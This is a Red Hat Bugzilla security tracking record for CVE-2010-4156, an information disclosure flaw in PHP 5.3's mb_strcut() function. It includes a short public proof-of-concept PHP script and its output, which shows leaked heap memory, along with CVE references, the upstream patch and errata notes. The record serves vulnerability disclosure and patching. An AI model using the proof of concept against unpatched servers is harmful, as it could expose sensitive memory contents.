Bug 651682 (CVE-2010-4156)

Summary: CVE-2010-4156 php information disclosure via mb_strcut()
Product: [Other] Security Response Reporter: Huzaifa S. Sidhpurwala <huzaifas>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED ERRATA QA Contact:
Severity: medium Docs Contact:
Priority: medium    
Version: unspecifiedCC: fedora, jorton, rpm, vdanen
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2011-02-04 09:11:38 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:
Bug Depends On: 649186, 670439, 670463, 670464    
Bug Blocks:    

Description Huzaifa S. Sidhpurwala 2010-11-10 04:51:48 UTC 
An information disclosure flaw was found in the PHP mb_struct function.

mb_strcut() returns garbage when the following conditions are met:
1. The value specified to length parameter exceeds the length of the subject 
string.
2. mbstring.internal_encoding is set to some single-byte encoding.

The garbage may consist of uncleared part of the heap that has previously been 
used for some purpose, which could lead to unexpected information exposure.
This only affects PHP 5.3 and above.

This bug was originally reported to php upstream by Mateusz Kocielski.

Common Vulnerabilities and Exposures assigned an identifier CVE-2010-4156 to
the above vulnerability

Upstream bugs:
http://bugs.php.net/bug.php?id=53273
http://bugs.php.net/bug.php?id=49354

Upstream patch:
http://svn.php.net/viewvc/?view=revision&amp;revision=305214

References:
http://www.mandriva.com/en/security/advisories?name=MDVSA-2010:225
http://www.securityfocus.com/bid/44727
http://secunia.com/advisories/42135
Comment 1 Huzaifa S. Sidhpurwala 2010-11-10 04:57:17 UTC 
Public PoC:

Test script:
---------------
<?php
$b = "bbbbbbbbbbb";
str_repeat("THIS IS A SECRET MESSAGE, ISN'T IT?", 1);
$var3 = mb_strcut($b, 0, 1000);
echo $var3;
?>


Expected result:
----------------
bbbbbbbbbbb

Actual result:
--------------
bbbbbbbbbbb??????D$Ј=m???=m?(?=m?`?=m??5<m??=m?THIS IS A SECRET MESSAGE, ISN'T 
IT??g?1@?=m?(?=m???=m?p?=m?var3
Comment 2 Huzaifa S. Sidhpurwala 2010-11-10 05:20:37 UTC 
Created php tracking bugs for this issue

Affects: fedora-all [bug 649186]
Comment 4 Vincent Danen 2010-11-10 06:28:45 UTC 
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-4156 to
the following vulnerability:

Name: CVE-2010-4156
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4156
Assigned: 20101104
Reference: MLIST:[oss-security] 20101107 CVE Request: PHP 5.3.3, libmbfl, mb_strcut
Reference: URL: http://www.openwall.com/lists/oss-security/2010/11/07/2
Reference: MLIST:[oss-security] 20101108 Re: CVE Request: PHP 5.3.3, libmbfl, mb_strcut
Reference: URL: http://www.openwall.com/lists/oss-security/2010/11/08/13
Reference: MISC: http://pastie.org/1279428
Reference: MISC: http://pastie.org/1279682
Reference: BID:44727
Reference: URL: http://www.securityfocus.com/bid/44727
Reference: SECUNIA:42135
Reference: URL: http://secunia.com/advisories/42135

The mb_strcut function in Libmbfl 1.1.0, as used in PHP 5.3.x through
5.3.3, allows context-dependent attackers to obtain potentially
sensitive information via a large value of the third parameter (aka
the length parameter).
Comment 6 Tomas Hoger 2011-01-18 13:10:31 UTC 
It seems this issue got introduced in the update of bundled libmbfl that happened between 5.3.2 and 5.3.3:

  http://svn.php.net/viewvc?view=revision&revision=296101
Comment 9 errata-xmlrpc 2011-02-03 19:17:08 UTC 
This issue has been addressed in following products:

  Red Hat Enterprise Linux 5

Via RHSA-2011:0196 https://rhn.redhat.com/errata/RHSA-2011-0196.html
Comment 10 Vincent Danen 2011-02-03 19:34:45 UTC 
Statement:

This issue did not affect the version of php packages as shipped with Red Hat Enterprise Linux 4, 5 or 6.  It did affect the PHP 5.3 (php53) package on Red Hat Enterprise Linux 5.